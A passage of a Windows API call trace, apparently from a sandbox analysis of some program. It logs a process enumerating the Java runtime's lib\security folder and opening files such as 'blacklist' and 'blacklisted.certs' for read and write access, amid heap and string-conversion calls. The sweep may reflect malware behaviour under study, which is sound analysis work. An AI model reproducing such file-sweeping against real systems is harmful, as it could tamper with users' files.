files\\java\\jre1.8.0_144\\lib\\security"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0097.791] GetLastError () returned 0x5 [0097.791] GetLastError () returned 0x5 [0097.791] SetLastError (dwErrCode=0x5) [0097.791] GetLastError () returned 0x5 [0097.791] SetLastError (dwErrCode=0x5) [0097.791] GetLastError () returned 0x5 [0097.791] SetLastError (dwErrCode=0x5) [0097.791] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0097.791] AreFileApisANSI () returned 1 [0097.791] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e420, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 48 [0097.791] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a98 [0097.791] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e420, cbMultiByte=-1, lpWideCharStr=0x71a98, cchWideChar=48 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security") returned 48 [0097.791] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0097.791] GetLastError () returned 0x5 [0097.792] GetLastError () returned 0x5 [0097.792] SetLastError (dwErrCode=0x5) [0097.792] GetLastError () returned 0x5 [0097.792] SetLastError (dwErrCode=0x5) [0097.792] GetLastError () returned 0x5 [0097.792] SetLastError (dwErrCode=0x5) [0097.792] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0097.792] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0097.792] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0097.792] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0097.792] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.792] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.792] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.792] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.792] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d108 [0097.792] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.792] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a5b0 [0097.792] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d108 | out: hHeap=0x20000) returned 1 [0097.792] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.792] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0097.792] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a5b0 | out: hHeap=0x20000) returned 1 [0097.792] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c9d0cc, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c9d0cc, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c9d0cc, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4ba, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="sound.properties", cAlternateFileName="SOUND~1.PRO")) returned 1 [0097.792] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.792] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0097.792] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.792] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0097.792] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0097.792] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0097.792] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0097.792] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0097.792] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0097.792] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0097.792] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0097.792] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0097.793] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0097.793] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0097.793] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a498 [0097.793] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0097.793] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78250 [0097.795] FindNextFileW (in: hFindFile=0x78250, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8c76e77, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa1418338, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa8c9d0cc, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0097.795] FindNextFileW (in: hFindFile=0x78250, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c76e77, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c76e77, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c76e77, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xfd6, dwReserved0=0x0, dwReserved1=0x0, cFileName="blacklist", cAlternateFileName="BLACKL~1")) returned 1 [0097.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a498 | out: hHeap=0x20000) returned 1 [0097.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0097.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0097.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0097.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0097.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0097.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0097.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46748 [0097.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0097.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0097.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f10 [0097.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0097.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f10 | out: hHeap=0x20000) returned 1 [0097.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0097.795] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350f0 [0097.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0097.795] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350f0 | out: hHeap=0x20000) returned 1 [0097.796] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.796] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0097.796] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.796] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a790 [0097.796] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0097.796] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.796] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0097.796] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a790 | out: hHeap=0x20000) returned 1 [0097.796] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.796] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.796] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.796] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.796] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0097.796] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.796] AreFileApisANSI () returned 1 [0097.796] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\blacklist", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\blacklist", lpUsedDefaultChar=0x0) returned 58 [0097.796] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0097.796] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.796] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.796] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0097.796] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0097.796] AreFileApisANSI () returned 1 [0097.796] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 58 [0097.796] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x74) returned 0x69db0 [0097.796] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x69db0, cchWideChar=58 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\blacklist") returned 58 [0097.796] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\blacklist" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\blacklist"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0097.797] GetFileType (hFile=0x33c) returned 0x1 [0097.797] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0097.797] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0097.797] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0097.797] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0097.797] CloseHandle (hObject=0x33c) returned 1 [0097.798] AreFileApisANSI () returned 1 [0097.798] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 58 [0097.798] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x74) returned 0x69db0 [0097.798] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x69db0, cchWideChar=58 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\blacklist") returned 58 [0097.798] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\blacklist" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\blacklist"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0097.798] GetFileType (hFile=0x33c) returned 0x1 [0097.798] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0097.798] CloseHandle (hObject=0x33c) returned 1 [0097.798] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.798] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.798] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0097.798] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0097.798] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0097.798] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.798] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.798] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0097.798] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.798] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0097.798] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0097.798] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.798] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0097.798] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0097.798] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.798] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.799] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.799] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0097.799] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0097.799] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0097.799] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0097.799] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0097.799] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.799] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.799] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0097.799] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0097.799] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0097.799] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0097.799] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0097.799] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0097.799] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.799] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0097.799] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0097.799] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0097.799] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0097.799] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0097.799] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0097.799] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0097.799] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0097.799] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.799] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0097.799] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.799] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.799] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.799] AreFileApisANSI () returned 1 [0097.799] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 58 [0097.799] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x74) returned 0x69db0 [0097.799] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x69db0, cchWideChar=58 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\blacklist") returned 58 [0097.799] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\blacklist" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\blacklist"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c76e77, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c76e77, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c76e77, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xfd6)) returned 1 [0097.799] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0097.799] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0097.799] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0097.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0097.800] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.800] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.800] FindNextFileW (in: hFindFile=0x78250, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c76e77, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c76e77, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c76e77, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4e5, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="blacklisted.certs", cAlternateFileName="BLACKL~1.CER")) returned 1 [0097.800] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.800] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0097.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.800] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0097.800] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0097.800] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0097.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0097.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0097.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0097.800] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0097.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0097.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0097.800] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0097.800] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0097.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0097.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0097.800] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0097.800] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35030 [0097.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0097.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35030 | out: hHeap=0x20000) returned 1 [0097.800] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0097.800] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71c38 [0097.800] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0097.800] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8abb8 [0097.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71c38 | out: hHeap=0x20000) returned 1 [0097.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0097.800] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a8c0 [0097.800] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8abb8 | out: hHeap=0x20000) returned 1 [0097.800] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.800] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.800] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.800] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.801] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a8c0 | out: hHeap=0x20000) returned 1 [0097.801] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0097.801] AreFileApisANSI () returned 1 [0097.801] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\blacklisted.certs", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\blacklisted.certs", lpUsedDefaultChar=0x0) returned 66 [0097.801] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d108 [0097.801] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, 